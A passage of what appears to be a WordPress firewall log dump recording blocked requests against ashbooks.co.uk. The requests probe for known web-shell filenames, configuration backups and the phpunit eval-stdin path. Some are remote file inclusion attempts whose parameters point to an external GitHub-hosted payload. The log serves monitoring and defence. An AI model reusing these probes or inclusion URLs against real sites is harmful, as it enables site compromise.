Safari\\/537.36\"}','fpU869ma7kxVdBYoF0Et54Dz',0,1636422483.5488,429,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/xx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','K6nijZAgMaR4sQ1NwHv9BV2f',0,1636422491.1284,432,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/g.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','WNaRIYZGt2eomnbxT7wQ3v5P',0,1636422501.8686,424,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/m.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','rlGBeC1jimQLf860VvpaAEMw',0,1636422516.6151,450,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/shell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','SmxF0XhQiObojzJ9EDY3paB4',0,1636422527.6076,435,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/sh3ll.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','wWeUa0XZfbq26iS3FxnNmAyg',0,1636422540.9383,425,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/c99.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','mlcvyju5RiVADwspMInPzTL6',0,1636422546.5158,430,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/alexuse.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ZimId0nfGvq1r9EYDBcxHXey',0,1636422572.0138,406,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/w.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ojtzuAr1WNGafREbLw5ln3qY',0,1636422577.9940,408,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/ws.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','vmRMtIAw9XK8hlrE3Nzc6gsU',0,1636422596.9598,397,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/2.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','wxK3eGDyvbWNgLasFO4zlfY7',0,1636422603.1276,408,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/lol.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','deq2KJcuRlxbQMUajNzFi9VD',0,1636422607.7269,422,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/87.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','WkrBfGLhXy8b9YZpoxQiNR2n',0,1636422615.2910,416,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/7yn.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','nMq8ESeKUIhtC2XfHdsmPGoF',0,1636422632.0171,400,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/haxor.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','B9obRSnm4FAeZxYlzVvCh6dL',0,1636422636.2791,455,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/403.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Zb8cyIk72FVDswSgJ3f4ejiU',0,1636422646.7362,404,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/13.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','xK2vfgQhZYiBekonLNSPAW71',0,1636422657.7886,399,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/cpanel.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ji0LDO9VWJFlK5Q4xXmnAGIM',0,1636422664.5170,421,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/wp-configr.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','87ytEVDdL3JPXc2ZevOfYG56',0,1636422680.7520,413,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/lufix.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','k0T2GlywsugxoRYVj83CriLQ',0,1636422692.6949,462,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/olux.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','wN1sXRtZqb9vjzyh6xLPlT80',0,1636422698.7687,413,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/shadow.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','o4UMn1ZmJ6SNgWYcjL0COEpy',0,1636422716.2941,536,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/xd.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','nNG7mYlkwyzeWHEh8BrQSFAp',0,1636422722.4901,432,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/XD.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','aBNrU2cQpo9i3CMKbxwtOvZu',0,1636422774.2082,531,'','GET',403,0,700,0,1,'',0),('162.243.228.106',2733892714,'','https://ashbooks.co.uk/wp-admin/upload_index.php?auth=f02pz3831W0DTtLgq26L','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"ashbooks.co.uk\"}','gwtSu5mXlYR94o1esPEI86vA',0,1636433808.1619,601,'','GET',403,0,700,0,1,'',0),('45.144.225.29',764469533,'','https://ashbooks.co.uk/style.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','sIKnWXSQcPCuiZ5oqawrtBJk',0,1636433925.7295,446,'','GET',403,0,700,0,1,'',0),('45.144.225.29',764469533,'','https://ashbooks.co.uk/moduless.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','hdtvaNsVGIZB8Ag4izTrqEfp',0,1636433948.9025,412,'','GET',403,0,700,0,1,'',0),('45.144.225.29',764469533,'','https://ashbooks.co.uk/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','pbVuhRMqsdrZ9tHx0B6PoDFg',0,1636433972.4588,413,'','GET',403,0,700,0,1,'',0),('45.144.225.29',764469533,'','https://ashbooks.co.uk/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','0K4XDkp7olYOu2SJw5TiVCLn',0,1636433982.3687,160,'','GET',403,0,700,0,1,'',0),('212.83.147.15',3562246927,'','https://ashbooks.co.uk/old-index.php?daksldlkdsadas=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"ashbooks.co.uk\"}','EPjn7wATvF9L8tCV2IBRG5fm',0,1636433989.8540,405,'','GET',403,0,700,0,1,'',0),('45.144.225.29',764469533,'','https://ashbooks.co.uk/boom.php?x','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','hOVl9XIpFrQJNExgjRk02ACD',0,1636434000.9882,391,'','GET',403,0,700,0,1,'',0),('45.144.225.29',764469533,'','https://ashbooks.co.uk/wp-content/plugins/backup_index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','RIvfioKrACQYFUVx8wZH5O0D',0,1636434003.2247,380,'','GET',403,0,700,0,1,'',0),('45.144.225.29',764469533,'','https://ashbooks.co.uk/wp-content/db_cache.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','820sMcHXeQwxfIraRdDmOlyN',0,1636434024.5518,493,'','GET',403,0,700,0,1,'',0),('45.144.225.29',764469533,'','https://ashbooks.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','EAhaYkduCDFj2RLZ4vnQbMyU',0,1636434043.6734,580,'','GET',403,0,700,0,1,'',0),('45.144.225.29',764469533,'','https://ashbooks.co.uk/wpindex.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','r7s9gXvdDE4iVA1xNmHMu0BY',0,1636434079.2110,373,'','GET',403,0,700,0,1,'',0),('45.144.225.29',764469533,'','https://ashbooks.co.uk/larva.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','I7WhVMe4uyFXROriDfoLHzTs',0,1636434099.1424,406,'','GET',403,0,700,0,1,'',0),('45.144.225.29',764469533,'','https://ashbooks.co.uk/th3_err0r.php?php=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','fJ7kPqldxDGethg1FTsvQWM6',0,1636434113.8247,397,'','GET',403,0,700,0,1,'',0),('45.144.225.29',764469533,'','https://ashbooks.co.uk/alfindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','BcJpy4uG6xhC2M1vULdlmV9j',0,1636434124.4856,387,'','GET',403,0,700,0,1,'',0),('45.144.225.29',764469533,'','https://ashbooks.co.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','150IlbrL8SXafVpEzUjow7Os',0,1636434145.4826,436,'','GET',403,0,700,0,1,'',0),('45.144.225.29',764469533,'','https://ashbooks.co.uk/wp-booking.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','u6ZPBeHMGRv40j7Xs9fln5Lq',0,1636434176.2704,420,'','GET',403,0,700,0,1,'',0),('45.144.225.29',764469533,'','https://ashbooks.co.uk/cindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','l2N017zVxesQJD86iyav4o95',0,1636434198.7256,371,'','GET',403,0,700,0,1,'',0),('45.144.225.29',764469533,'','https://ashbooks.co.uk/wp-content/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','JB9GLIz1VdmbC5H8FOSPZvEl',0,1636434220.9489,401,'','GET',403,0,700,0,1,'',0),('45.144.225.29',764469533,'','https://ashbooks.co.uk/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','4kKiRrzjSTLNoAMXgtaWJeYm',0,1636434237.6486,470,'','GET',403,0,700,0,1,'',0),('45.144.225.29',764469533,'','https://ashbooks.co.uk/wp-includes/fonts/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','OofaFjDNeipwhTKs06LPIcQC',0,1636434252.7239,460,'','GET',403,0,700,0,1,'',0),('45.144.225.29',764469533,'','https://ashbooks.co.uk/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','QqFSL2OuhZCpoJcD5sVEvRXa',0,1636434269.0429,469,'','GET',403,0,700,0,1,'',0),('45.144.225.29',764469533,'','https://ashbooks.co.uk/old-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','ZlsdvohixcYnUTOADwRV4Itb',0,1636434293.2399,402,'','GET',403,0,700,0,1,'',0),('45.144.225.29',764469533,'','https://ashbooks.co.uk/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Yob8JkQB97hEGUzwadfjlVSp',0,1636434307.7719,177,'','GET',403,0,700,0,1,'',0),('45.144.225.29',764469533,'','https://ashbooks.co.uk/wp-admin/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','s4Q2m8OpdtPBaDgU6FCcNZkE',0,1636434325.1249,417,'','GET',403,0,700,0,1,'',0),('45.144.225.29',764469533,'','https://ashbooks.co.uk/wp-content/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','dWr9YyeZwTJAIUzGH2kS60ib',0,1636434340.3323,713,'','GET',403,0,700,0,1,'',0),('45.144.225.29',764469533,'','https://ashbooks.co.uk/wp-includes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','LvWdSpeRTnVYfoUZBgAjaz64',0,1636434361.7820,435,'','GET',403,0,700,0,1,'',0),('45.144.225.29',764469533,'','https://ashbooks.co.uk/wp-content/themes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','uSCeOcsgbwHUWAMX4doPtjRG',0,1636434375.9840,637,'','GET',403,0,700,0,1,'',0),('45.144.225.29',764469533,'','https://ashbooks.co.uk/wp-content/plugins/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','cJvo5AhKgHP94XB16L7uj8fY',0,1636434390.0139,752,'','GET',403,0,700,0,1,'',0),('45.144.225.29',764469533,'','https://ashbooks.co.uk/wp-includes/css/wp-config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','UZVbAXBmQ7saHucWP19OEdzg',0,1636434410.2021,439,'','POST',403,0,700,0,1,'',0),('45.144.225.29',764469533,'','https://ashbooks.co.uk/wp-content/plugins/ubh/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','gUN1j76EhLlMaBVxdJ5pnys8',0,1636434428.8270,672,'','GET',403,0,700,0,1,'',0),('45.144.225.29',764469533,'','https://ashbooks.co.uk/wp-includes/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','zoA7UiONCDZgTfFER5Jt60eq',0,1636434448.2542,430,'','GET',403,0,700,0,1,'',0),('45.144.225.29',764469533,'','https://ashbooks.co.uk/wp-content/plugins/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','3OPbneNUFzX0YSqlpMCa69cE',0,1636434465.9806,359,'','GET',403,0,700,0,1,'',0),('45.144.225.29',764469533,'','https://ashbooks.co.uk/haders.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','aTu0e12WVCxiIsXYd5SwrE3h',0,1636434482.2514,345,'','GET',403,0,700,0,1,'',0),('45.144.225.29',764469533,'','https://ashbooks.co.uk/wp-content/wp-old-index.php?action=login&pass=-1&submit=','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','L2UqSNZrBAY83v5McuXWgKIT',0,1636434497.8792,911,'','GET',403,0,700,0,1,'',0),('45.144.225.29',764469533,'','https://ashbooks.co.uk/legion.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','DiTKqrN2ho189AtZv3fpHyQk',0,1636434512.3479,888,'','GET',403,0,700,0,1,'',0),('45.144.225.29',764469533,'','https://ashbooks.co.uk/wp-content/mu-plugins/db-safe-mode.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','1ysX0YxNM9mE86AK4JH25qQU',0,1636434529.4685,399,'','GET',403,0,700,0,1,'',0),('45.144.225.29',764469533,'','https://ashbooks.co.uk/wp-includes/lfx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','01pVJQh64KCba8qLPToX2RSG',0,1636434549.1585,366,'','GET',403,0,700,0,1,'',0),('45.144.225.29',764469533,'','https://ashbooks.co.uk/wp-includes/small.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','LQkcaNFyC2veGA36TnZ0XEr9',0,1636434564.0632,355,'','GET',403,0,700,0,1,'',0),('45.144.225.29',764469533,'','https://ashbooks.co.uk/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','CcrUqHYskjb5RD3Go01weJv8',0,1636434577.1652,650,'','GET',403,0,700,0,1,'',0),('45.144.225.29',764469533,'','https://ashbooks.co.uk/upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','PpuFtyZKg8A74mUJR2jQzBbx',0,1636434590.6848,406,'','GET',403,0,700,0,1,'',0),('45.144.225.29',764469533,'','https://ashbooks.co.uk/config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','8djnDNXk02TLZoWauvC1fsJz',0,1636434611.2424,457,'','GET',403,0,700,0,1,'',0),('45.144.225.29',764469533,'','https://ashbooks.co.uk/test.php?Ghost=send','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','IZ9Yjltch3SW4mXLvwBGT1ny',0,1636434642.4428,414,'','GET',403,0,700,0,1,'',0),('45.144.225.29',764469533,'','https://ashbooks.co.uk/wp-content/langar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','gya6FitUTKknIzQd3Ge9J5Ds',0,1636434661.6172,412,'','GET',403,0,700,0,1,'',0),('45.144.225.29',764469533,'','https://ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','85Fm3wCy0oLfxQdIbnD4ri9l',0,1636434682.0759,675,'','GET',403,0,700,0,1,'',0),('45.144.225.29',764469533,'','https://ashbooks.co.uk/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','2rvJNkLdqWPuCBt3bKR60Qfx',0,1636434702.9591,462,'','GET',403,0,700,0,1,'',0),('212.83.147.15',3562246927,'','https://ashbooks.co.uk/upl.php','','{\"1\":\"Mozilla\\/5.1 (Windows NT 6.0; WOW64) AppleWebKit\\/533.36 (KHTML, like Gecko) Chrome\\/46.0.2754.75 Safari\\/533.36\",\"2\":\"ashbooks.co.uk\"}','jgh5SUtrAPKxaw19Vo6kBef0',0,1636435488.3567,459,'','GET',403,0,700,0,1,'',0),('46.246.3.202',787874762,'','https://www.ashbooks.co.uk/weblog/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.72 Safari\\/537.36\",\"2\":\"https:\\/\\/www.ashbooks.co.uk\\/weblog\\/index.php\"}','0BuU2LIRGsCpeknNdAwvox7b',0,1636439636.4390,824,'','GET',403,0,700,0,1,'',0),('20.90.26.23',341449239,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','gvcxUqEPLIhrjlS7kMJCn4T3',0,1636467658.7120,2231,'','GET',403,0,520,0,1,'',0),('2.56.59.43',37239595,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.106 Safari\\/537.36\"}','OpvVCHMtbzXerANlEBZqjsUR',0,1636489227.7556,139,'','GET',403,0,520,0,1,'',0),('157.245.174.114',2650123890,'','https://ashbooks.co.uk/x.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','NzCTjhEP1D7vFHcI84ur9kgi',0,1636500136.3693,404,'','GET',403,0,700,0,1,'',0),('157.245.174.114',2650123890,'','https://ashbooks.co.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','9gTK0BM3W6pEe1J5VqZno4ka',0,1636500137.0815,387,'','GET',403,0,700,0,1,'',0),('157.245.174.114',2650123890,'','https://ashbooks.co.uk/c99.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 